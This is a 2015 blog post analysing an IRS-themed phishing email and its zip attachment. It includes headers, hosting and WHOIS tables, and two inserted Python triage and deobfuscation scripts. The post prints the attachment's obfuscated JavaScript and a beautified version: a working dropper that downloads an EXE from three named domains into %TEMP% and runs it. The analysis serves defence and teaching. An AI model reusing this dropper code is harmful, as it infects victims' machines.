Tuesday, September 15, 2015

An IRS tax refund phishing scam illustrates the widespread failure of hosting and antivirus providers' security measures

Scams focused on stealing tax refunds remain highly profitable, despite the fact that they are well known and understood by security professionals and the general public, and have been for years. A variety of distribution methods are used, with the common threads being the use of IRS logos and bureaucratic-sounding language to convince users to click a link, download and execute a file and/or send personally identifying information like a Social Security number. A recent example of one such scam that I came across is a damning illustration of the failure of online service providers to protect users from obvious and simple malware distribution methods.

In the example I wish to discuss today, the distribution method was a spammed email that, on a small ISP's installation of SpamAssassin (note: I am not an admin or employee of this system; I'm a customer), received an X-Spam-Status score of 5.3 after triggering the following rules:

X-Spam-Status: No, score=5.3 required=10.0 tests=AM_TRUNCATED,CK_419SIZE,
CK_KARD_SIZE,ENV_FROM_DIFF,ENV_FROM_DIFF0,FROM_SECURITY,HAS_REPLY_TO,
HEADER_FROM_DIFFERENT_DOMAINS,JUNKE_IXHASH,LINK_NR_TOP,MAILPHISH_REPLYTO,
PSTOCK_PART,TO_NOREAL,XPRIO,ZIP_ATTACH shortcircuit=no  
        autolearn=disabled version=3.4.0 

While the default SpamAssassin threshold for marking a message as spam is 5.0, few admins leave this default value. SpamAssassin itself recommends that admins of multi-user mail servers use a threshold of 8 to 10. I don't have this ISP's spamassassin.conf file, and it has obviously been customized. My point here isn't to take issue with SpamAssassin, which I have used for many years, but to demonstrate how this message made its way to mailboxes through pretty solid security software despite these being included in the headers:

From: "Internal Revenue Service" <office@irs.gov> 
Reply-To: "Internal Revenue Service" <office@irs.gov>  
Return-Path: <servers@abitindia.com>
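As an added illustration (my own code, not from the original post), here is a small Python triage script that applies the checks this post relies on to a constructed copy of the headers quoted above: it parses the X-Spam-Status score and rule list, compares the score against SpamAssassin's stock 5.0 threshold and the site's own required value, and flags the mismatch between the From/Reply-To domain and the Return-Path domain. The sample headers are constructed from the values quoted in this post (including the ClamAV verdict headers quoted further down); the Subject line and body are invented placeholders.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: the headers quoted in this post, folded the way a
# real header would be. The Subject and body are invented placeholders.
RAW_MESSAGE = """\
From: "Internal Revenue Service" <office@irs.gov>
Reply-To: "Internal Revenue Service" <office@irs.gov>
Return-Path: <servers@abitindia.com>
X-Spam-Status: No, score=5.3 required=10.0 tests=AM_TRUNCATED,CK_419SIZE,
    CK_KARD_SIZE,ENV_FROM_DIFF,ENV_FROM_DIFF0,FROM_SECURITY,HAS_REPLY_TO,
    HEADER_FROM_DIFFERENT_DOMAINS,JUNKE_IXHASH,LINK_NR_TOP,MAILPHISH_REPLYTO,
    PSTOCK_PART,TO_NOREAL,XPRIO,ZIP_ATTACH shortcircuit=no
    autolearn=disabled version=3.4.0
X-Virus-Scanned: clamav-milter 0.98.7 at mx1.riseup.net
X-Virus-Status: Clean
Subject: [placeholder] Tax refund notification

(body omitted)
"""

SPAMASSASSIN_DEFAULT_THRESHOLD = 5.0  # stock required_score


def domain_of(header_value):
    """Return the lower-cased domain of the first address in a header, or ''."""
    address = parseaddr(header_value)[1]
    return address.rpartition("@")[2].lower()


def parse_spam_status(header_value):
    """Parse an X-Spam-Status header into verdict, score, required score and rule names."""
    if not header_value:
        return None
    # Unfold the header, then drop the space SpamAssassin inserts after a comma
    # when it wraps the tests= list across lines.
    value = re.sub(r",\s+", ",", re.sub(r"\s+", " ", header_value)).strip()
    score = re.search(r"score=(-?[\d.]+)", value)
    required = re.search(r"required=([\d.]+)", value)
    tests = re.search(r"tests=([A-Z0-9_,]+)", value)
    return {
        "flagged": value.startswith("Yes"),
        "score": float(score.group(1)) if score else None,
        "required": float(required.group(1)) if required else None,
        "tests": tests.group(1).split(",") if tests else [],
    }


def triage(raw_message, default_threshold=SPAMASSASSIN_DEFAULT_THRESHOLD):
    """Return the sender domains, the parsed spam verdict and a list of findings."""
    msg = message_from_string(raw_message)
    from_dom = domain_of(msg.get("From", ""))
    reply_dom = domain_of(msg.get("Reply-To", ""))
    path_dom = domain_of(msg.get("Return-Path", ""))
    spam = parse_spam_status(msg.get("X-Spam-Status", ""))
    findings = []
    # Header From and envelope sender (Return-Path) from different domains.
    if from_dom and path_dom and from_dom != path_dom:
        findings.append(f"envelope sender {path_dom} does not match From domain {from_dom}")
    # Score that the stock threshold would have caught but the site's did not.
    if spam and spam["score"] is not None and spam["required"] is not None:
        if default_threshold <= spam["score"] < spam["required"]:
            findings.append(
                f"score {spam['score']} would be spam at the stock {default_threshold} "
                f"threshold but passes this site's required={spam['required']}")
    # An archive attachment with a "Clean" AV verdict is still worth a look.
    if spam and "ZIP_ATTACH" in spam["tests"]:
        findings.append(
            f"zip attachment present; X-Virus-Status={msg.get('X-Virus-Status')} "
            "reflects signature coverage, not a clean bill of health")
    return {"from_domain": from_dom, "reply_to_domain": reply_dom,
            "return_path_domain": path_dom, "spam": spam, "findings": findings}


if __name__ == "__main__":
    for line in triage(RAW_MESSAGE)["findings"]:
        print("-", line)
```

Run against the sample, the script reports three findings: the abitindia.com envelope sender behind an irs.gov From, a 5.3 score that clears the stock threshold but not the site's 10.0, and a zip attachment that the "Clean" verdict does not vouch for.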

Here's another depressing bonus. In addition to SpamAssassin, the recipient mail server had ClamAV installed. The message had a .ZIP file attachment, and the mail server's ClamAV install marked it as clean:

X-Virus-Scanned: clamav-milter 0.98.7 at mx1.riseup.net
X-Virus-Status: Clean

The attachment does in fact contain JavaScript nasty-ware, and ClamAV is not alone in failing to pick it up. According to VirusTotal, 31 out of 56 AV platforms failed to detect this file - including Symantec, TrendMicro, Panda, Malwarebytes, Avast and Avira. In defense of these AV heavyweights, the file used a single basic obfuscation function to disguise its purpose - which at the moment is apparently enough to fool these AV packages.

/* var str="5550575E141114141D070D0001000624160D170111144A0A0110";/* var g=eu390753(); */ /* var g=eu154143(); */ function eu740030()
{ return 'nd('; }; function eu678074() { return 'htt'; }; function eu650538() { return '; '; }; /* var g=eu195033(); */ /* var
g=eu990052(); */ function eu712494() { return '"+fr'; }; /* var g=eu488625(); */ /* var g=eu243875(); */ /* var g=eu862948(); */ /*
var g=eu154376(); */ function eu209962() { return 'EMP%"'; }; function eu454344() { return '); x'; }; /* var g=eu421168(); */ function
eu165216() { return 'ell")'; }; /* var g=eu451609(); */ function eu265034() { return '000'; }; /* var g=eu281022(); */ /* var
g=eu562156(); */ /* var g=eu838888(); */ function eu757240() { return '{}'; }; /* var g=eu702000(); */ /* var g=eu954001(); */ /* var
g=eu531084(); */ /* var g=eu119797(); */ /* var g=eu120668(); */ function eu612676() { return ' ca'; }; /* var g=eu542506(); */
function eu760682() { return '; if '; }; /* var g=eu512391(); */ /* var g=eu825797(); */ /* var g=eu168021(); */ /* var g=eu847813();
*/ function eu526626() { return ' > 5'; }; /* var g=eu507959(); */ /* var g=eu606845(); */ /* var g=eu297163(); */ function eu137680()
{ return ' ws '; }; function eu134238() { return 'ar'; }; /* var g=eu368403(); */ /* var g=eu610114(); */ /* var g=eu598843(); */
function eu24094() { return 'var'; }; function eu636770() { return 'cl'; }; function eu437134() { return 'je'; }; function eu3442()
{return 'func'; }; /* var g=eu502971(); */ /* var g=eu841213(); */ function eu299454() { return 'r xo '; }; function eu488764()
{return 'a.wri'; }; function eu192752() { return 'ro'; }; /* var g=eu970337(); */ /* var g=eu548839(); */ /* var g=eu136213(); */
function eu557604() { return ' 0'; }; function eu86050() { return 'r".'; }; function eu413040() { return ' 200'; };
/* var g=eu669196(); */ function eu505974() { return 'eBody'; }; function eu189310() { return 'Envi'; }; function eu736588() {
return 'xo.se'; }; /* var g=eu897527(); */ function eu282244() { return ' var'; }; function eu653980() { return 'try'; }; function
eu722820() { return 'str,'; }; function eu75724() { return 'es-eg'; }; function eu223730() { return 'Char'; }; /* var g=eu979959(); */
function eu709052() { return 'rnd='; }; function eu485322() { return ' x'; }; /* var g=eu341942(); */ /* var g=eu948885(); */ function
eu784776() { return '};'; }; /* var g=eu926393(); */ /* var g=eu901298(); */ function eu691842() {return 'do'; }; /* var g=eu885496();
*/ function eu110144() { return 'i='; }; function eu416482() { return ') {'; }; /* var g=eu120975(); */ function eu798544() { return
'dl(56'; }; function eu58514() { return 'scomm'; }; function eu247824() { return 'd('; }; function eu364852() { return 'ction'; };
function eu302896() { return '= new'; }; function eu285686() { return ' dn ';}; /* var g=eu821728(); */ /* var g=eu842788(); */ /*
var g=eu661571(); */ /* var g=eu363472(); */ function eu216846() { return 'ing'; }; /* var g=eu833123(); */ /* var g=eu103287(); */
function eu178984() { return 's.E'; }; /* var g=eu838741(); */ function eu426808() { return '= new'; }; function eu433692() {
return 'veXOb'; }; function eu330432() { return 'XML'; }; /* var g=eu154291(); */ /* var g=eu305402(); */ function eu27536() {
return ' b ='; }; function eu801986() { return '12'; }; /* var g=eu883666(); */ /* var g=eu679789(); */ /* var g=eu280128(); */
function eu702168() { return 'nt.ph'; }; /* var g=eu205206(); */ /* var g=eu755657(); */ /* var g=eu296601(); */ /* var g=eu994237();
*/ function eu447460() { return '.Stre'; }; /* var g=eu606497(); */ /* var g=eu341165(); */ function eu640212() { return 'ose()'; };
function eu48188() { return 'club'; }; function eu227172() { return 'Code'; }; /* var g=eu586861(); */ function eu230614() {
return '(92)'; }; /* var g=eu248884(); */ /* var g=eu455866(); */ /* var g=eu974554(); */ /* var g=eu716295(); */ /* var g=eu728948();
*/ /* var g=eu134779(); */ function eu585140() { return ' {'; }; function eu361410() { return 'un'; }; function eu564488() {
return 'a.sav'; }; function eu402714() { return 'sta'; }; function eu240940() { return 'ro'; }; function eu220288() {
return '.from'; }; /* var g=eu316494(); */ /* var g=eu344649(); */ function eu347642() { return 'dy'; }; /* var g=eu450983(); */
function eu523184() { return 'ize'; }; function eu89492() { return 'sp'; }; /* var g=eu472250(); */ /* var g=eu927839(); */ /*
var g=eu161789(); */ function eu320106() { return '("'; }; function eu812312() { return '767'; }; function eu567930() { return 'eToF';
}; function eu41304() { return 'st'; }; function eu196194() { return 'nment'; }; /* var g=eu417989(); */ function eu781334() {
return '; '; }; function eu44746() { return 'ling'; }; function eu392388() { return ' 4 '; }; /* var g=eu280394(); */ /*
var g=eu549748(); */ function eu481880() { return '1;'; }; function eu92934() { return 'lit'; }; function eu357968() { return 'e = f';
}; function eu777892() { return '; }'; }; /* var g=eu936640(); */ /* var g=eu812518(); */ function eu34420() { return 'kins'; }; /*
var g=eu798270(); */ /* var g=eu495143(); */ function eu65398() { return 'rtlan'; }; /* var g=eu413662(); */ function eu213404() {
return ')+Str'; }; function eu543836() { return '.p'; }; /* var g=eu942938(); */ function eu771008() { return ' bre'; }; /*
var g=eu586511(); */ /* var g=eu376498(); */ function eu375178() { return ' (xo.'; }; /* var g=eu791942(); */ function eu144564() {
return ' Acti'; }; function eu254708() { return '.rand'; }; function eu536952() { return '= 1'; }; function eu141122() {
return '= new'; }; function eu292570() { return '; '; }; /* var g=eu274913(); */ /* var g=eu365805(); */ /* var g=eu865509(); */
function eu461228() { return 'pen'; }; /* var g=eu411289(); */ /* var g=eu532861(); */ function eu423366() { return 'r xa '; };
function eu309780() { return 've'; }; function eu684958() { return '"+b['; }; /* var g=eu585353(); */ /* var g=eu987364(); */
function eu746914() { return 'cat'; }; /* var g=eu350417(); */ function eu499090() { return 'espo'; }; /* var g=eu139667(); */
function eu406156() { return 'tu'; }; /* var g=eu742334(); */ function eu602350() { return ',1,';}; /* var g=eu606213(); */ /*
var g=eu222109(); */ function eu68840() { return 'ka.n'; }; function eu154890() { return '("WS'; }; function eu368294() {
return '() {'; }; /* var g=eu967067(); */ /* var g=eu434327(); */ /* var g=eu185076(); */ /* var g=eu851480(); */ /*
var g=eu563477(); */ /* var g=eu939168(); */ function eu674632() { return 'ET","'; }; /* var g=eu995946(); */ function eu657422() {
return ' {'; }; /* var g=eu329671(); */ /* var g=eu956885(); */ /* var g=eu974115(); */ /* var g=eu659091(); */ function eu533510() {
return '{ dn '; }; /* var g=eu937903(); */ /* var g=eu140157(); */ /* var g=eu337724(); */ function eu172100() { return 'ar fn'; };
function eu399272() { return 'xo.'; }; function eu175542() {return ' = w'; }; /* var g=eu948434(); */ /* var g=eu951552(); */
function eu474996() { return 'ype '; }; function eu574814() { return 'n,2'; }; function eu598908() { return 'fn'; }; /* var
g=eu237348(); */ /* var g=eu867693(); */ function eu595466() { return 'un('; }; /* var g=eu500120(); */ function eu664306() {
return 'op'; }; function eu151448() { return 'ject'; }; /* var g=eu837452(); */ function eu340758() { return '.onr'; }; /*
var g=eu552763(); */ function eu275360() { return '.ex'; }; /* var g=eu284543(); */ /* var g=eu657020(); */ function eu371736() {
return ' if'; }; function eu354526() { return 'chang'; }; function eu530068() { return '000) '; }; /* var g=eu499927(); */
function eu540394() { return '; xa'; }; function eu79166() { return 'lanti'; }; function eu316664() { return 'ject'; }; /*
var g=eu324828(); */ /* var g=eu106693(); */ /* var g=eu221461(); */ function eu82608() { return 'ers.f'; }; /* var g=eu232361(); */
/* var g=eu247610(); */ function eu203078() { return 'ing'; }; function eu571372() { return 'ile(f'; }; /* var g=eu508170(); */ /*
var g=eu524992(); */ function eu251266() { return 'Math'; }; /* var g=eu444120(); */ /* var g=eu228627(); */ /* var g=eu944619(); */
function eu13768() { return 'dl('; }; /* var g=eu150088(); */ function eu495648() { return 'o.R'; }; /* var g=eu547818(); */
function eu120470() { return 'ngth'; }; /* var g=eu723537(); */ function eu261592() { return '*100'; }; function eu647096() {
return ' }'; }; function eu323548() { return 'MS'; }; /* var g=eu764913(); */ function eu750356() { return 'ch ('; };
function eu103260() { return 'or ('; }; /* var g=eu301263(); */ /* var g=eu856389(); */ function eu729704() { return 'lse'; }; /*
var g=eu394485(); */ /* var g=eu652959(); */ /* var g=eu820332(); */ function eu605792() { return '0);'; }; function eu378620() {
return 're'; }; /* var g=eu299631(); */ function eu234056() { return '+Ma'; }; function eu660864() { return ' xo.'; }; function
eu271918() { return '+"'; }; function eu705() { return 'eval'; }; function eu206520() { return 's("%T'; }; function eu629886() {
return '}; };'; }; /* var g=eu250176(); */ function eu296012() { return 'va'; }; function eu688400() { return 'i]+"/'; }; function
eu333874() { return 'HTTP"'; }; /* var g=eu736808(); */ function eu592024() { return 's.R'; }; /* var g=eu161128(); */ /*
var g=eu511839(); */ function eu791660() { return '(61'; }; function eu715936() { return '+"&'; }; /* var g=eu638536(); */ /*
var g=eu723405(); */ function eu554162() { return 'n ='; }; /* var g=eu886669(); */ /* var g=eu504833(); */ /* var g=eu242011(); */
function eu130796() { return ' v'; }; function eu6884() { return 'tio'; }; /* var g=eu664690(); */ function eu726262() { return ' fa';
}; function eu72282() { return 'et l'; }; /* var g=eu462911(); */ function eu805428() { return '); d'; }; /* var g=eu961461(); */ /*
var g=eu629451(); */ function eu258150() { return 'om()'; }; /* var g=eu680773(); */ /* var g=eu570464(); */ function eu516300() {
return 'f (xa'; }; function eu444018() { return 'ADODB'; }; /* var g=eu645736(); */ function eu681516() { return 'p://'; }; function
eu667748() { return 'en'; }; /* var g=eu300938(); */ /* var g=eu957330(); */ function eu51630() { return '.c'; }; /* var g=eu605933();
*/ /* var g=eu830980(); */ /* var g=eu568139(); */ function eu519742() { return '.s'; }; function eu578256() { return ');'; };
function eu509416() { return ');'; }; function eu168658() { return '; v'; }; function eu430250() { return ' Acti'; }; /*
var g=eu698885(); */ /* var g=eu949928(); */ function eu106702() { return 'var '; }; function eu478438() { return '= '; };
function eu502532() { return 'ns'; }; /* var g=eu408561(); */ function eu313222() { return 'XOb'; }; function eu182426() {
return 'xpa'; }; /* var g=eu115840(); */ /* var g=eu313359(); */ function eu753798() { return 'er) '; }; function eu382062() {
return 'adyS'; }; function eu306338() { return ' Acti'; }; /* var g=eu820304(); */ function eu733146() { return '); '; }; /*
var g=eu348585(); */ function eu588582() { return ' w'; }; /* var g=eu120899(); */ function eu161774() { return 'pt.Sh'; };
function eu774450() { return 'ak'; }; /* var g=eu945050(); */ function eu55072() { return 'om sy'; }; function eu609234() {
return ' }'; }; function eu616118() { return 'tc'; }; function eu561046() { return '; x'; }; /* var g=eu292960(); */ /*
var g=eu180880(); */ /* var g=eu192056(); */ /* var g=eu832125(); */ function eu30978() { return ' "dic'; }; /* var g=eu781191();
*/ function eu148006() { return 'veXOb'; }; /* var g=eu380646(); */ function eu550720() { return 'io'; }; function eu185868() {
return 'nd'; }; function eu351084() { return 'state'; }; /* var g=eu947682(); */ /* var g=eu420108(); */ /* var g=eu797646(); */
/* var g=eu808293(); */ /* var g=eu788790(); */ function eu705610() { return 'p?'; }; function eu409598() { return 's =='; }; /*
var g=eu286588(); */ function eu719378() { return 'id="+'; }; /* var g=eu654127(); */ /* var g=eu353993(); */ /* var g=eu600816();
*/ /* var g=eu187534(); */ function eu117028() { return 'b.le'; }; function eu61956() { return '.sma'; }; function eu289128() {
return '= 0'; }; /* var g=eu590833(); */ /* var g=eu385012(); */ /* var g=eu666069(); */ /* var g=eu175678(); */ function eu468112()
{ return '; '; }; function eu388946() { return '=='; }; function eu492206() { return 'te(x'; }; var g = ''; function eu450902() {
return 'am"'; }; function eu464670() { return '()'; }; /* var g=eu649532(); */ function eu547278() { return 'osit'; }; /* var
g=eu562310(); */ /* var g=eu222069(); */ function eu764124() { return '(dn ='; }; /* var g=eu227792(); */ function eu199636() { return
'Str'; }; function eu344200() { return 'ea'; }; /* var g=eu651793(); */ function eu643654() { return '; };'; }; /* var g=eu562379();
*/ /* var g=eu563133(); */ function eu419924() { return ' va'; }; /* var g=eu202407(); */ function eu698726() { return 'me'; };
function eu99818() { return '); f'; }; function eu113586() { return '0; i<'; }; function eu326990() { return 'XML2.'; }; function
eu10326() { return 'n '; }; /* varg=eu317234(); */ /* var g=eu477220(); */ function eu395830() { return '&& '; }; function
eu278802() { return 'e";'; }; /* var g=eu343859(); */ function eu808870() { return 'l('; }; /* var g=eu927825(); */ function
eu819196() { return ';'; }; /* var g=eu238588(); */ function eu471554() { return 'xa.t'; }; function eu623002() {return 'er'; };
function eu788218() { return ' dl'; }; function eu581698() { return ' try'; }; /* var g=eu316786(); */ function eu633328() {
return ' xa.'; }; function eu619560() { return 'h ('; }; /* var g=eu675038(); */ function eu795102() { return '61); '; }; /*
var g=eu982732(); */ function eu512858() { return ' i'; }; function eu158332() { return 'cri'; }; /* var g=eu350074(); */
function eu244382() { return 'un'; }; /* var g=eu883721(); */ /* var g=eu201317(); */ function eu237498() { return 'th.'; }; /*
var g=eu797567(); */ function eu96376() { return '(" "'; }; function eu127354() { return ') {'; }; /* var g=eu206174(); */ /*
var g=eu150840(); */ /* var g=eu589107(); */ /* var g=eu552644(); */ /* var g=eu801214(); */ /* var g=eu557823(); */ function
eu767566() { return '= 1)'; }; /* var g=eu108702(); */ /* var g=eu459085(); */ function eu37862() { return 'onwre'; }; function
eu17210() { return 'fr)'; }; /* var g=eu978188(); */ function eu440576() { return 'ct("'; }; function eu123912() { return '; i++'; };
function eu743472() { return '); } '; }; /* var g=eu447463(); */ function eu815754() { return '3)'; }; function eu385504() {
return 'tate '; }; /* var g=eu586679(); */ function eu626444() { return ') {'; }; function eu20652() { return ' { '; }; /*
var g=eu855746(); */ /* var g=eu451678(); */ /* var g=eu430071(); */ /* var g=eu849527(); */ /* var g=eu622118(); */ function
eu268476() { return '000)'; }; /* var g=eu601964(); */ /* var g=eu254555(); */ /* var g=eu261686(); */ function eu457786() { return
'a.o'; }; function eu695284() { return 'cu'; }; /* var g=eu974457(); */ /* var g=eu968835(); */ /* var g=eu601355(); */ /*
var g=eu571118(); */ function eu671190() { return '("G'; }; function eu337316() { return '); xo'; }; /* var g=eu493574(); */ /*
var g=eu840048(); */ /* var g=eu333794(); */for (var yy=1; yy<=238; yy++) { g += this['eu'+(yy*3442)](); }; this[eu705()](); */

One round through Einar Lielmanis' JS Beautifier later, and we have this:

function dl(fr) {
  var b = "dickinsonwrestlingclub.com syscomm.smartlanka.net les-eglantiers.fr".split(" ");
  for (var i = 0; i < b.length; i++) {
    var ws = new ActiveXObject("WScript.Shell");
    var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe";
    var dn = 0;
    var xo = new ActiveXObject("MSXML2.XMLHTTP");
    xo.onreadystatechange = function() {
      if (xo.readyState == 4 && xo.status == 200) {
        var xa = new ActiveXObject("ADODB.Stream");
        xa.open();
        xa.type = 1;
        xa.write(xo.ResponseBody);
        if (xa.size > 5000) {
          dn = 1;
          xa.position = 0;
          xa.saveToFile(fn, 2);
          try {
            ws.Run(fn, 1, 0);
          } catch (er) {};
        };
        xa.close();
      };
    };
    try {
      xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + str, false);
      xo.send();
    } catch (er) {};
    if (dn == 1) break;
  };
};
dl(6161);
dl(5612);
dl(7673);

The script creates an EXE file in the %TEMP% directory - usually something like C:\Users\UserName\AppData\Local\Temp - named with a random number, fills it with whatever it retrieves from one of the three domain names listed (dickinsonwrestlingclub.com, syscomm.smartlanka.net or les-eglantiers.fr) and, if the response is larger than 5000 bytes, runs it.
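The fragment-concatenation scheme used by the attachment is simple enough to undo without ever evaluating the script, which is how an analyst or a mail gateway should handle a sample like this. The following Python is an added example, not code from this post or from JS Beautifier: it strips the decoy comments, collects the function-to-fragment table, reads the loop's count and step out of the for statement, joins the fragments in loop order and reports what the final this[...]() call resolves to. The obfuscated input below is a constructed, harmless imitation of the attachment (same structure, a 77-character payload, c2.example as a placeholder domain, not a real indicator); a static indicator pass then pulls the ActiveX ProgIDs and URLs out of the reconstructed text, the same way the ProgIDs and domain list were read off the beautified script above.

```python
import re

# Constructed sample in the same shape as the attachment above: fragments are
# returned by functions named eu<N>, decoy comments reference functions that
# do not exist, and a loop joins eu(yy*step) for yy = 1..count before handing
# the result to this[eu1()](), where eu1() returns 'eval'. The payload is
# harmless and c2.example is a placeholder domain, not a real indicator.
SAMPLE = r'''/* var g=eu77(); */ function eu18() { return '("ADO'; }; /* var g=eu91(); */
function eu3() { return 'var o'; }; function eu33() { return ' "htt'; }; /* var
g=eu14(); */ function eu48() { return '";'; }; function eu9() { return 'w Act'; };
function eu24() { return 'ream"'; }; /* var g=eu50(); */ function eu6() { return ' = ne'; };
function eu39() { return '2.exa'; }; function eu12() { return 'iveXO'; }; function
eu45() { return 'd.php'; }; /* var g=eu2(); */ function eu27() { return '); va'; };
function eu21() { return 'DB.St'; }; function eu1() { return 'eval'; }; function eu36()
{ return 'p://c'; }; function eu15() { return 'bject'; }; function eu30() { return 'r u ='; };
/* var g=eu60(); */ function eu42() { return 'mple/'; }; var g = '';
for (var yy=1; yy<=16; yy++) { g += this['eu'+(yy*3)](); }; this[eu1()]();
'''

COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)
FUNC_RE = re.compile(r"function\s+(eu\d+)\s*\(\)\s*\{\s*return\s*'([^']*)'\s*;\s*\}")
LOOP_RE = re.compile(r"yy<=(\d+);\s*yy\+\+\)\s*\{\s*g\s*\+=\s*this\['eu'\+\(yy\*(\d+)\)\]")
SINK_RE = re.compile(r"this\[(eu\d+)\(\)\]\(\)")
PROGID_RE = re.compile(r'ActiveXObject\(\s*"([^"]+)"\s*\)')
URL_RE = re.compile(r"""https?://[^\s"']+""")


def fragment_table(src):
    """Map each real function name to the string it returns (comments removed first)."""
    return dict(FUNC_RE.findall(COMMENT_RE.sub(" ", src)))


def decoy_count(src):
    """Count eu<N> names referenced inside comments that are never defined."""
    defined = set(fragment_table(src))
    referenced = set()
    for comment in COMMENT_RE.findall(src):
        referenced.update(re.findall(r"eu\d+", comment))
    return len(referenced - defined)


def deobfuscate(src):
    """Rebuild the payload string statically and name the function it is handed to."""
    frags = fragment_table(src)
    loop = LOOP_RE.search(src)
    if loop is None:
        raise ValueError("concatenation loop not found")
    count, step = int(loop.group(1)), int(loop.group(2))
    parts = []
    for yy in range(1, count + 1):
        name = f"eu{yy * step}"
        if name not in frags:
            raise ValueError(f"fragment {name} is missing")
        parts.append(frags[name])
    sink = SINK_RE.search(src)
    sink_name = frags.get(sink.group(1)) if sink else None
    return "".join(parts), sink_name


def extract_indicators(payload):
    """Static pass over the rebuilt payload: COM ProgIDs and URLs it references."""
    return {"progids": sorted(set(PROGID_RE.findall(payload))),
            "urls": sorted(set(URL_RE.findall(payload)))}


if __name__ == "__main__":
    payload, sink = deobfuscate(SAMPLE)
    print(f"{decoy_count(SAMPLE)} decoy references; payload handed to {sink}()")
    print(payload)
    print(extract_indicators(payload))
```

The decoy count is a cheap triage signal on its own: a script whose comments call dozens of functions that are never defined is padding, and padding of exactly this kind is what pushed the real attachment past the signature engines. Because nothing is evaluated, the same functions can run inside a mail filter or sandbox pre-screen with no risk of executing the payload.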

There are a number of domains and hosts associated with this scam.

Malware domains

Domain | IP | Host | Registrant | Contact | DNS IPs
dickinsonwrestlingclub.com | 72.20.64.58 | Consolidated Telcom | Perfect Privacy, LLC | N/A | 72.20.64.11, 72.20.64.12
syscomm.smartlanka.net | 69.89.31.73 | box273.bluehost.com / Bluehost / Unified Layer | Dilhan Seneviratne | prabhath247@gmail.com | 74.220.195.31, 69.89.16.4
les-eglantiers.fr | 76.74.242.190 | hp92.hostpapa.com / Peer 1 Network / Cogeco | John Huisman / Camping Beau Rivag | huisman.huisman@orange.fr | 69.90.36.133, 204.15.193.53

Spam domains

Domain | IP | Host | Email Provider | Contact | DNS IPs
abitindia.com | 54.165.102.41 | Amazon EC2 | Gmail | accounts@abitindia.com | 50.23.136.229, 50.23.75.96, 162.251.82.118, 184.173.150.57
mail.netspaceindia.com | 74.54.133.186 | The Planet | N/A | help@netspaceindia.com | 205.251.196.41, 205.251.192.135, 205.251.199.124, 205.251.195.214
netspaceindia.com | 104.131.68.147 | Digital Ocean | N/A | help@netspaceindia.com | 205.251.196.41, 205.251.192.135, 205.251.199.124, 205.251.195.214

Taking a look at the hosts involved in this scam provides even further disappointment. abitindia.com, whose email is managed by Gmail, is providing the return-path for the spam messages but not the reply-to. Replies, incredibly, go directly to the IRS support email address. The reply-to header is commonly forged so that backscatter goes to some random sucker. In this case, abitindia.com is affiliated with the sender domain netspaceindia.com:

Domain Name: ABITINDIA.COM
Updated Date: 2014-11-24T05:21:07Z
Creation Date: 2006-11-23T19:31:19Z
Registrar Registration Expiration Date: 2015-11-23T19:31:19Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Registrant Name: Netspaceindia
Registrant Organization: Netspaceindia
Registrant Street: Hall no 3, Wing B, Parshuram apt Above Woodlands Showroom College Road Nashik
Registrant City: Nashik
Registrant State/Province: Maharashtra
Registrant Postal Code: 422005
Registrant Country: IN
Registrant Phone: +91.9975444464
Registrant Email: accounts@abitindia.com
Name Server: dns1.netspaceindia.com
Name Server: dns2.netspaceindia.com
Name Server: dns3.netspaceindia.com
Name Server: dns4.netspaceindia.com


In other words, in many circumstances backscatter recipients are innocent victims. That is not the case here - the sender is managing the backscatter recipient address, likely to keep their mailing lists updated. As such, Google could play a role in putting a stop to this scam - a review of the backscatter would make the relationship between sender and backscatter recipient obvious, and in an ideal world would precipitate the suspension of the Google Apps account for "abitindia.com".

To be fair, Google's responsibility here is minimal - particularly when compared to the role that every other hosting provider plays in this. The Planet and Digital Ocean are providing the infrastructure for the spam campaign, while Bluehost, Cogeco and Consolidated Telcom are providing the infrastructure for hosting the malware. It's likely that the accounts with these providers were created using fraudulent/stolen payment information, or that legitimate accounts were compromised. This sort of thing is an everyday occurrence for hosting providers; for providers who do not invest in abuse response, these types of scams can use the same accounts with the same hosting providers for months if not years. When I come across this sort of scam, I do my best to inform the hosting providers involved using the abuse contact information that is required to be associated with IP/DNS registrations, along with enough evidence for the provider to confirm I'm not a nut. It is unusual to receive a response and even more unusual to receive a non-automated response. It is just as unusual for hosting provider staff to review their abuse@ contacts, let alone resolve the issues they receive.

Hemming and hawing over the need for state intervention to prevent "cyber-attacks" (vomit) and scams like the ones described here is all over the place. Many of those who support such a view make it a point to justify government intervention because of the incredible sophistication and technical complexity of the scams that plague internet users. However, the overwhelming majority of the scams I have encountered over the course of my career involved well known techniques and software. There is significant room for improvement in security practices by applying what we already know: like how to prevent (or rapidly stop) a 30 year old scam using 20 year old spam techniques to circulate 10 year old malware.
